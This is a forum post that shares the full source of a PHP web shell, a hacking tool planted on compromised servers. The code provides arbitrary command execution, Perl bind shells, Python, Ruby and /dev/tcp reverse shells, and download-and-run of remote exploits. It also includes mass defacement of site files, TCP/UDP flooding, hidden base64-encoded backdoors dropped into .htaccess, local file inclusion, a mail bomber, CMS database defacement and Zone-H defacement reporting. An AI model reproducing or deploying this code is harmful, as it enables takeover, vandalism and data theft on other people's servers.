pinacolada Posted March 17, 2013 Share Posted March 17, 2013 <?php // ================================ // if user is logged in if(isset($_*******['loggedin']) && !empty($_*******['loggedin'])){ // welcome user echo " Server: ".gethostbyname($_SERVER["HTTP_HOST"])." You: ".$_SERVER['REMOTE_ADDR']." Php: ".phpversion()." Apache: ".$_SERVER['SERVER_SOFTWARE']." OS: ".php_uname().""; ?> home files php.ini upload encoders bind exploit symlink eval mass proc zone-h ddos mysql tools phpinfo log out kill <?php if(ini_get('safe_mode') == '1'){ echo ' Safe mode: ON'; } else{ echo ' Safe mode: OFF'; } if(ini_get('magic_quotes_gpc') == '1'){ echo ' Magic_quotes_gpc: ON Turn off'; } else{ echo ' Magic_quotes_gpc: OFF'; } if(function_exists('mysql_connect')){ echo ' Mysql: ON'; } else{ echo ' Mysql: OFF'; } if(function_exists('mssql_connect')){ echo ' Mssql: ON'; } else{ echo ' Mssql: OFF'; } if(function_exists('pg_connect')){ echo ' PostgreSQL: ON'; } else{ echo ' PostgreSQL: OFF'; } if(function_exists('ocilogon')){ echo ' Oracle: ON'; } else{ echo ' Oracle: OFF'; } if(function_exists('curl_version')){ echo ' Curl: ON'; } else{ echo ' Curl: OFF'; } if(function_exists('exec')){ echo ' Exec: ON'; } else{ echo ' Exec: OFF'; } if(!ini_get('open_basedir') != "on"){ echo ' Open_basedir: OFF'; } else{ echo ' Open_basedir: ON'; } if(!ini_get('ini_restore') != "on"){ echo ' Ini_restore: OFF'; } else{ echo ' Ini_restore: ON'; } ?> <?php echo ' Disable_functions: '; if(ini_get('disable_functions') == ''){ echo ' None'; } else{ echo ''; echo ini_get('disable_functions'); echo ''; } ?> <?php if(isset($_POST['source']) && isset($_POST['file'])){ $source = $_POST['source']; $file = $_POST['file']; $fp = fopen($file, 'w'); fwrite($fp, $source); fclose($fp); echo 'File saved'; } if(isset($_GET['turnoff'])){ if(is_writable(".htaccess")){ $value = $_GET['turnoff']; if(file_exists(".htaccess")){ // fread example $handle = fopen(".htaccess", "r"); $contents = ''; while (!feof($handle)) { $read = fread($handle, 8192); $contents = $contents.$read; ?> Use htaccess to turn php.ini functions on/offExample: php_value magic_quotes_gpc off <?php if($value == 'magic_quotes_gpc'){ $data = 'php_value magic_quotes_gpc off '.$contents; echo $data; } else{ echo $contents; } ?> <?php } fclose($handle); } } if(!file_exists(".htaccess")){ // make htaccess file $myfile = '.htaccess'; $handle = fopen($myfile, 'w') or die('Cannot open file: '.$myfile); fclose($handle); echo ' File created click here '; } ?> <?php } // make file if(isset($_GET['make'])){ // file maker if(!file_exists($_GET['make'])){ // make htaccess file $myfile = $_GET['make']; $handle = fopen($myfile, 'w') or die('Cannot open file: '.$myfile); fclose($handle); echo ' File created click here '; } else{ echo ' This file exist. delete open'; } } if(isset($_GET['get'])){ // download $file = $_GET['get']; if (file_exists($file)) { header('Content-Description: File Transfer'); header('Content-Type: application/octet-stream'); header('Content-Disposition: attachment; filename='.basename($file)); header('Content-Transfer-Encoding: binary'); header('Expires: 0'); header('Cache-Control: must-revalidate'); header('Pragma: public'); header('Content-Length: ' . filesize($file)); ob_clean(); flush(); readfile($file); exit(); } } if(isset($_GET['view'])){ $file = $_GET['view']; ?> <?php if(file_exists($file)){ $open = htmlspecialchars(file_get_contents($file)); if($open){ echo $open; } } else{ echo ' FILE DOES NOT EXISTS'; } ?> Download Delete <?php } if(isset($_GET['action']) && $_GET['action'] == 'symlink'){ $a = fopen("lolz.pl", "w"); fputs($a, $symlink); fclose($a); system("perl lolz.pl"); } if(isset($_GET['action']) && $_GET['action'] == 'ddos' && empty($_POST['ip'])){ ?> ~Ddos~ TCP UDP <?php } if(isset($_GET['action']) && $_GET['action'] == 'ddos' && !empty($_POST['ip'])){ $url = $_POST['ip']; if($_POST['way'] == "TCP"){ DDOSTcp($url); } else if($_POST['way'] == "UDP"){ DDOSUdp($url); } else{ echo 'No other methods.'; } } if(isset($_GET['action']) && $_GET['action'] == 'eval'){ ?> ~Eval~ <?php if(isset($_GET['evalit'])){ if(function_exists("system")){ $ev = $_GET['evalit']; echo eval(stripslashes($ev)); } else{ echo 'eval disabled'; } } echo ''; } if(isset($_GET['action']) && $_GET['action'] == 'exploit'){ ?> ~Get and execute~ Type: c++ | .cpp python | .py perl | .pl ruby | .rb <?php } if(isset($_GET['exp_url'])){ echo ''; if(function_exists("wget")){ wget($_GET['exp_url']); echo $_GET['exp_url'].' got in here'; if(function_exists("system")){ if(isset($_GET['run'])){ $run = $_GET['run']; if($run = 'c++ | .cpp'){ system("gcc -o exploit ".$_GET['exp_url'].";chmod +x exploit;./exploit;"); } if($run = 'perl | .pl'){ } if($run = 'python | .py'){ } if($run = 'ruby | .rb'){ } } } else{ echo 'System command disabled'; } } else{ echo('wget disabled'); } echo ''; } if(isset($_GET['action']) && $_GET['action'] == 'bind'){ if(!isset($_POST['port']) && empty($_POST['ip']) && empty($_POST['pyip']) && empty($_POST['rbip'])){ echo "#1 ./perl"; echo ' #2 ./bash #3 ./python #4 ./ruby linux #5 ./ruby win '; } else{ if(isset($_POST['port'])){ $bind = " #!/usr/bin/perl \$port = {$_POST['port']}; \$port = \$ARGV[0] if \$ARGV[0]; exit if fork; $0 = \"updatedb\" . \" \" x100; \$SIG{CHLD} = 'IGNORE'; use Socket; socket(S, PF_INET, SOCK_STREAM, 0); setsockopt(S, SOL_SOCKET, SO_REUSEADDR, 1); bind(S, sockaddr_in(\$port, INADDR_ANY)); listen(S, 50); while(1) { accept(X, S); unless(fork) { open STDIN, \"<&X\"; open STDOUT, \">&X\"; open STDERR, \">&X\"; close X; exec(\"/bin/sh\"); } close X; } "; $fp = fopen("bind.pl", "w"); fwrite($fp, $bind); fclose($fp); exec("perl bind.pl"); } if(isset($_POST['rbip'])){ $ip = $_POST['rbip']; $port = $_POST['rbport']; $ruby = "ruby -rsocket -e 'exit if fork;c=TCPSocket.new(\"".$ip."\",\"".$port."\");while(cmd=c.gets);IO.popen(cmd,\"r\"){|io|c.print io.read}end'"; $fp = fopen("bind.rb", "w"); fwrite($fp, $ruby); fclose($fp); exec("ruby bind.rb"); } if(isset($_POST['rbipw'])){ $ip = $_POST['rbipw']; $port = $_POST['rbportw']; $ruby = "ruby -rsocket -e 'c=TCPSocket.new(\"".$ip."\",\"".$port."\");while(cmd=c.gets);IO.popen(cmd,\"r\"){|io|c.print io.read}end'"; $fp = fopen("bind_win.rb", "w"); fwrite($fp, $ruby); fclose($fp); exec("ruby bind_win.rb"); } if(isset($_POST['pyip'])){ $ip = $_POST['pyip']; $port = $_POST['pyport']; $bind = "python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"".$ip."\",".$port."));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'"; $fp = fopen("bind.py", "w"); fwrite($fp, $bind); fclose($fp); exec("python bind.py"); } if(isset($_POST['ip']) && !empty($_POST['theport'])) { $ip = $_POST['ip']; $port = $_POST['theport']; if(function_exists('exec')){ echo 'Exec command not blocked,,,, continuing'; exec('0<&196;exec 196<>/dev/tcp/.$ip./.$port.; sh <&196 >&196 2>&196'); } else{ echo 'Exec command is blocked blocked by admin'; } } } echo ''; } if(isset($_GET['action']) && $_GET['action'] == 'proc'){ ?> <?php echo shell_exec("tasklist").""; ?> <?php } if(isset($_GET['action']) && $_GET['action'] == 'mass'){ if(!isset($_GET['code'])){ ?> <?php echo ' Mass deface script, php/html/htm/asp/aspx/js YOUR DEFACE PAGE HERE =) Folder: '; } else{ if (is_dir($_GET['dir'])) { $lolinject = $_GET['code']; foreach (glob($_GET['dir']."/*.php") as $injectj00) { $fp=fopen($injectj00,"a+"); if (fputs($fp,$lolinject)){ echo $injectj00.' was injected'; } else { echo 'failed to inject '.$injectj00.''; } } foreach (glob($_GET['dir']."/*.html") as $injectj00) { $fp=fopen($injectj00,"a+"); if (fputs($fp,$lolinject)){ echo $injectj00.' was injected'; } else { echo 'failed to inject '.$injectj00.''; } } foreach (glob($_GET['dir']."/*.htm") as $injectj00) { $fp=fopen($injectj00,"a+"); if (fputs($fp,$lolinject)){ echo $injectj00.' was injected'; } else { echo 'failed to inject '.$injectj00.''; } } foreach (glob($_GET['dir']."/*.asp") as $injectj00) { $fp=fopen($injectj00,"a+"); if (fputs($fp,$lolinject)){ echo $injectj00.' was injected'; } else { echo 'failed to inject '.$injectj00.''; } } foreach (glob($_GET['dir']."/*.js") as $injectj00) { $fp=fopen($injectj00,"a+"); if (fputs($fp,$lolinject)){ echo $injectj00.' was injected'; } else { echo 'failed to inject '.$injectj00.''; } } foreach (glob($_GET['dir']."/*.aspx") as $injectj00) { $fp=fopen($injectj00,"a+"); if (fputs($fp,$lolinject)){ echo $injectj00.' was injected'; } else { echo 'failed to inject '.$injectj00.''; } } } else { //end if inputted dir is real -- if not, show an ugly red error echo ''.$_GET['pathtomass'].' is not available!'; } // end if inputted dir is real, for real this time } } if(isset($_GET['action']) && $_GET['action'] == 'encoders'){ ?> Enc0d3 ~ D3c0d3 code here Base64_encode Base64_decode Urlencode Urldecode Hash_md5 Hash_sha1 Hash_sha512 <?php if(isset($_GET['action']) && $_GET['action'] == 'encoders' && !empty($_POST['code']) && !empty($_POST['encoded'])){ $format = $_POST['encoded']; $code = $_POST['code']; if($format == 'Base64_encode'){ echo base64_encode($code); } if($format == 'Base64_decode'){ echo base64_decode($code); } if($format == 'Urlencode'){ echo urlencode($code); } if($format == 'Urldecode'){ echo urldecode($code); } if($format == 'Hash_md5'){ echo md5($code); } if($format == 'Hash_sha1'){ echo sha1($code); } if($format == 'Hash_sha512'){ echo hash('sha512', $code); } } ?> <?php } if(isset($_GET['action']) && $_GET['action'] == 'mysql' && !empty($_GET['main']) && $_GET['main'] == 1){ ?> host user pass <?php } if(isset($_GET['action']) && $_GET['action'] == 'mysql' && !empty($_GET['main']) && $_GET['main'] == 2){ $host = $_POST['host']; $user = $_POST['user']; $pass = $_POST['pass']; mysql_connect($host, $user, $pass) or die('Not connected!'); $query = mysql_query('SHOW DATABASES'); echo ' Database'; while($rows=mysql_fetch_array($query)){ for($j=0;$j'; } } echo $result; echo ' '; mysql_close(); } if(isset($_GET['db']) && !empty($_GET['main']) && $_GET['main'] == 3){ $host = $_GET['host']; $user = $_GET['user']; $pass = $_GET['pass']; mysql_connect($host, $user, $pass) or die('Not connected!'); $db = $_GET['db']; $sql = "SHOW TABLES FROM ".$db; $result = mysql_query($sql); while ($row = mysql_fetch_row($result)) { echo ' '.$row[0].' '; } mysql_free_result($result); mysql_close(); } if(isset($_GET['db']) && !empty($_GET['main']) && $_GET['main'] == 4 && empty($_GET['column']) && !empty($_GET['table'])){ $host = $_GET['host']; $user = $_GET['user']; $pass = $_GET['pass']; mysql_connect($host, $user, $pass) or die('Not connected!'); mysql_select_db($_GET['db']) or die('Unable to select db'); $query = mysql_query("SHOW COLUMNS FROM ".$_GET['table']); while ($row = mysql_fetch_row($query)) { echo ' '.$row[0].' '; } mysql_free_result($query); mysql_close(); } if(isset($_GET['db']) && !empty($_GET['main']) && $_GET['main'] == 5 && !empty($_GET['column'])){ $host = $_GET['host']; $user = $_GET['user']; $pass = $_GET['pass']; mysql_connect($host, $user, $pass) or die('Not connected!'); mysql_select_db($_GET['db']) or die('Unable to select db'); $query = mysql_query("SELECT ".$_GET['column']." FROM ".$_GET['table']); echo ""; while($row = mysql_fetch_array($query)){ echo htmlspecialchars($row[$_GET['column']])."\n\n-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-\n\n"; } echo " "; } // tools if(isset($_GET['action']) && $_GET['action'] == 'zone-h' && !empty($_POST['hackmode'])){ if($_POST['SendNowToZoneH']) { echo ''; ob_start(); $sub = get_loaded_extensions(); if(!in_array("curl", $sub)){die('[-] Curl Is Not Supported !! ');} $hacker = $_POST['defacer']; $method = $_POST['hackmode']; $neden = $_POST['reason']; $site = $_POST['domain']; if (empty($hacker)){die ("[-] You Must Fill the Attacker name !");} elseif($method == "--------SELECT--------") {die("[-] You Must Select The Method !");} elseif($neden == "--------SELECT--------") {die("[-] You Must Select The Reason");} elseif(empty($site)) {die("[-] You Must Inter the Sites List ! ");} $i = 0; $sites = explode("\n", $site); while($i < count($sites)) { if(substr($sites[$i], 0, 4) != "http") {$sites[$i] = "http://".$sites[$i];} ZoneH("http://zone-h.org/notify/single", $hacker, $method, $neden, $sites[$i]); echo "Site : ".$sites[$i]." Defaced !\n"; ++$i; } echo "[+] Sending Sites To Zone-H Has Been Completed Successfully !! "; } echo ''; } if(isset($_GET['action']) && $_GET['action'] == 'zone-h'){ ?> Zone-H Defacer --------SELECT-------- known vulnerability (i.e. unpatched system) undisclosed (new) vulnerability configuration / admin. mistake brute force attack social engineering Web Server intrusion Web Server external module intrusion Mail Server intrusion FTP Server intrusion SSH Server intrusion Telnet Server intrusion RPC Server intrusion Shares misconfiguration Other Server intrusion SQL Injection URL Poisoning File Inclusion Other Web Application bug Remote administrative panel access bruteforcing Remote administrative panel access password guessing Remote administrative panel access social engineering Attack against administrator(password stealing/sniffing) Access credentials through Man In the Middle attack Remote service password guessing Remote service password bruteforce Rerouting after attacking the Firewall Rerouting after attacking the Router DNS attack through social engineering DNS attack through cache poisoning Not available --------SELECT-------- Heh...just for fun! Revenge against that website Political reasons As a challenge I just want to be the best defacer Patriotism Not available List Of Domains <?php } if(isset($_GET['action']) && $_GET['action'] == 'tools'){ ?> Cloudflare Ip finder ./x-h4ck CMS Fack wp/mybb/vb Some deface shit in here :P wpmybbvb vb = update faq, calendar, searchwp = update wordpress postsmybb = update mybb index <?php if(isset($_GET['folder'])){ $chemin=$_GET['folder']; $files = glob("$chemin*"); echo "Trying To List Folder $chemin"; foreach ($files as $filename) { echo ""; echo "$filename\n"; echo ""; } } else{ ?> List Directory <?php } if(isset($_GET['hex'])){ echo '0x'.bin2hex($_GET['hex']).''; } else{ ?> Text 2 Hex <?php } ?> <?php if(isset($_GET['lfi'])){ include($_GET['lfi']); } else{ ?> LFI Dude <?php } ?> Mail sender Subject: From: To: Body:We made some changes recent days and.. Times: <?php if(isset($_GET['cook'])){ $a = fopen("oncha.php", "w"); fputs($a, $o); fclose($a); } if(isset($_GET['s-option'])){ $op = $_GET['s-option']; if($op == ".htaccess"){ $o = stripslashes(base64_decode("IyBPdmVycmlkZSBkZWZhdWx0IGRlbnkgcnVsZSB0byBtYWtlIC5odGFjY2VzcyBmaWxlIGFjY2Vzc2libGUgb3ZlciB3ZWINCjxGaWxlcyB+IFwiXlxcLmh0XCI+DQpPcmRlciBhbGxvdyxkZW55DQpBbGxvdyBmcm9tIGFsbA0KPC9GaWxlcz4NCkFkZFR5cGUgYXBwbGljYXRpb24veC1odHRwZC1waHAgLmh0YWNjZXNzDQoNCiMjIyMjIyBTSEVMTCAjIyMjIyMgPD9waHAgZWNobyBcIlxcblwiO3Bhc3N0aHJ1KCRfR0VUW1wnY1wnXS5cIiAyPiYxXCIpOyA/PiMjIyMjIyBMTEVIUyAjIyMjIyM=")); $a = fopen(".htaccess", "w"); fputs($a, $o); fclose($a); echo 'Visit '.$_SERVER['HTTP_HOST'].'/.htaccess?c='; } else{ $o = stripslashes(base64_decode("PD9waHAgc3lzdGVtKCRfR0VUW1wnY1wnXSk7ID8+")); $a = fopen("dfgdfg.php", "w"); fputs($a, $o); fclose($a); echo 'Visit '.$_SERVER['HTTP_HOST'].'/dfgdfg.php?c='; } } else{ ?> Hide Shell .htaccess .php <?php } if(isset($_GET['fp'])){ $filepath = $_GET['fp']; $sitepath = $_GET['sp']; $writeblefilepath = 'myfile.txt'; $flib=$sitepath.$writeblefilepath; @unlink($flib); symlink($filepath, $flib); echo readlink($flib)."\n"; echo "".file_get_contents("http://".$_SERVER['HTTP_HOST']."/".$writeblefilepath).""; @unlink($flib); } else{ ?> Symlink #2 __First tool File path: Site path: <?php } ?> <?php if(isset($_POST['site'])){ /* FAK CLOUDFLARE, pirate.al, flashcrew.in, devilzc0de.org h4x0rs.net */ $fuckcloud = dns_get_record($_POST['site'], DNS_TXT); print_r($fuckcloud); } if(isset($_POST['subjekti'])){ $subject = $_POST['subjekti']; $email = $_POST['email']; $to = $_POST['to']; $comments = $_POST['arsyeja']; $times = $_POST['times']; for($i=0;$i<$times;$i++){ if(mail("$to", "$subject", "$comments", "From: $email")){ echo " Sent."; } else{ echo " Not sent!"; }}} if(isset($_POST['index'])){ $index = mysql_real_escape_string($_POST['index']); $host = $_POST['host']; $user = $_POST['user']; $pass = $_POST['pass']; $db = $_POST['db']; $tab = $_POST['tab']; mysql_connect($host, $user, $pass); mysql_select_db($db); $cat = $_POST['cat']; if($cat == 'wp'){ mysql_query("UPDATE ".$tab."posts SET post_title='".$index."'"); echo 'All posts updated :)'; } if($cat == 'mybb'){ mysql_query("UPDATE ".$tab."templates SET template='".$index."'"); echo 'Index f@cked :)'; } if($cat == 'vb'){ mysql_query("UPDATE ".$tab."template SET template ='".$index."' WHERE title ='faq'"); echo 'faq f@cked :)'; mysql_query("UPDATE ".$tab."template SET template ='".$index."' WHERE title ='calendar'"); echo 'calendar f@cked :)'; mysql_query("UPDATE ".$tab."template SET template ='".$index."' WHERE title ='search'"); echo 'search f@cked :)'; } } echo ''; } ?> <?php if(isset($_GET['action']) && $_GET['action'] == 'files'){ ?> Change directory Make directory <?php // delete if(isset($_GET['delete']) && !empty($_GET['action']) && $_GET['action'] == 'files'){ $file = $_GET['delete']; // if exist if(is_dir($file) || file_exists($file)){ // if file del if(!is_dir($file)){ unlink($file); echo 'File deleted'; } if(is_dir($file)){ function rmdirs($d) { $f = glob($d . '*', GLOB_MARK); foreach($f as $z){ if(is_dir($z)) rmdirs($z); else unlink($z); } if(is_dir($d)) rmdir($d); } rmdirs($file); echo 'Folder deleted'; } } else{ echo 'File or folder does not exist'; } } // rename if(isset($_GET['old_name']) && !empty($_GET['rename_file']) && !empty($_GET['action']) && $_GET['action'] == 'files'){ $old = $_GET['old_name']; $new = $_GET['rename_file']; // if new file or folder exist if(is_dir($new) || file_exists($new)){ echo ' File or folder exists. delete'; } else{ // if file or folder exist if(is_dir($old) || file_exists($old)){ if(rename($old, $new)){ if(is_dir($old)){ echo "Folder renamed sucsessfuly to ".$new.", open"; } if(!is_dir($old)){ echo "File renamed sucsessfuly to ".$new.", open"; } } else{ echo "Problem renaming ".$old.""; } } else{ echo ' File or folder not found.'; } } } if(isset($_GET['rename']) && !empty($_GET['action']) && $_GET['action'] == 'files'){ $file = $_GET['rename']; ?> Old Name: Rename to: <?php } // new dir if(isset($_GET['go']) && !empty($_GET['newdir']) && !empty($_GET['action']) && $_GET['action'] == 'files'){ $dir = $_GET['go']; $new = $_GET['newdir']; $currect = getcwd(); // if dir is dir if(is_dir($dir)){ // if dir exist if(is_dir($new)){ echo ' Directory exist. delete'; } else{ if(mkdir($new)){ echo ' Directory created'; } else{ echo ' Problem creating directory'; } if(!is_dir($dir)){ chdir($go); if(mkdir($new)){ echo ' Directory created'; } else{ echo ' Problem creating directory'; } } } } } // file browser $self = $_SERVER['PHP_SELF']; $dir = getcwd(); if(isset($_GET['go'])) { $dir = $_GET['go']; } if(is_dir($dir)) { $handle = opendir($dir); { showDrives(); ?> «back forward » <?php if($dir[(strlen($dir)-1)] != '/'){$dir = $dir.'/';} while (($file = readdir($handle)) != false) { if ($file != "." && $file != "..") { $color = 'red'; if(is_readable($dir.$file)) { $color = 'yellow'; } if(is_writable($dir.$file)) { $color = '#00ff00'; } if(is_dir($dir.$file)) { ?> [ <?php echo $file ?> ] <?php echo HumanReadableFilesize(dirSize($dir.$file));?> <?php echo getFilePermissions($dir.$file);?> > <?php echo getperms($dir); ?> Delete Rename Download Upload <?php } //Its a file else { ?> ;" href='<?php echo $self ?>?view=<?php echo $dir.$file ?>'><?php echo $file ?> <?php echo HumanReadableFilesize(filesize($dir.$file));?> <?php echo getFilePermissions($dir.$file);?> > <?php echo getperms($dir.$file); ?> Delete Rename Download <?php } } } closedir($handle); } } else { echo "Permission Denied"; } ?> <?php } ?> <?php if(!isset($_GET['action']) && !isset($_GET['upload']) && !isset($_GET['get']) && !isset($_GET['turnoff']) && !isset($_GET['view']) && !isset($_GET['db'])){ ?> Execute command Ready commands whoami netstat -an ls -la ls uname -a dir start cmd.exe cat /etc/passwd cat /etc/hosts Create file Chmod file ~~~~ chmod chown chgrp Passthru Exec Popen <?php } if(isset($_GET['thepass'])){ echo ''; passthru($_GET['thepass']); echo ''; } if(isset($_GET['theexec'])){ echo ''; if(!function_exists('exec')){ die('Exec command is blocked blocked by admin'); } else{ echo exec($_GET['theexec']); echo ''; } } if(isset($_GET['popen'])){ echo ''; if(!function_exists('popen')){ die('Popen command is blocked blocked by admin'); } else{ popen($_GET['popen'], "r"); echo ''; } } if(isset($_GET['thefile'])){ $file = $_GET['thefile']; $new = $_GET['thefileval']; if($_GET['comm'] == 'chmod') { $ch_ok = chmod($file,$new); echo "Permission Changed."; } else if($_GET['comm'] == 'chown') { $ch_ok = chown($file,$new); echo "Owner Changed."; } else if($_GET['comm'] == 'chgrp') { $ch_ok = chgrp($file,$new); echo "Group Changed."; } } if(isset($_FILES['upload'])){ //file upload echo ''; if(isset($_POST['location']) && !empty($_POST['location'])){ $target_path = $_POST['location']; $target_path = $target_path.'/'; } else{ $target_path = ""; } echo "File ".basename($_FILES["upload"]["name"])." uploaded."; if(move_uploaded_file($_FILES["upload"]["tmp_name"], $target_path . $_FILES["upload"]["name"])){ echo "The file ".basename($_FILES["upload"]["name"]). " has been uploaded"; } else{ echo "There was an error uploading the file, please try again!"; } echo ''; } if(isset($_GET['dirmake'])){ // change directory $dir = $_GET['dirmake']; ?>Command executed <?php echo 'Last dir: '.getcwd() . ""; chdir($dir); // current directory echo 'New dir: '.getcwd() . ""; ?> <?php } if(isset($_GET['command'])){ $command = $_GET['command']; if (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') { if(preg_match("/ls/", $command)||preg_match("/cat/", $command)||preg_match("/grep/", $command)||preg_match("/wget/", $command)||preg_match("/apt-get/", $command)||preg_match("/install/", $command)||preg_match("/mkdir/", $command)){ echo 'This command dont work on windows! '; } } if (strtoupper(substr(PHP_OS, 0, 3)) === 'UNI') { if(preg_match("/ls/", $command)||preg_match("/tree/", $command)||preg_match("/cd../", $command)){ echo 'This command dont work on linux! '; } } ?> <?php system($command); ?> <?php } ?> <?php // ============================ // get action // ============================ if(isset($_GET['action']) && !empty($_GET['action'])){ $action = $_GET['action']; if($action == "phpinfo"){ phpinfo(); } if($action == 'upload'){ ?> Upload file Upload to <?php } if($action == "kill"){ echo 'Do you really want to delete this shell ? '; ?> Yes No <?php } if($action == "killit"){ $file = $_SERVER['PHP_SELF']; $file = str_replace('/', '', $file); unlink($file); echo 'Bitch u killed me o.O'; header('refresh: 2; '.$_SERVER['PHP_SELF'].''); } if($action == "logout"){ unset($_*******['loggedin']); echo 'Logged out.'; } } } // ================================ // else login else{ if(isset($_*******['banned'])){ if($_*******['banned'] == '3'){ die($about.' Link to comment Share on other sites More sharing options...
Recommended Posts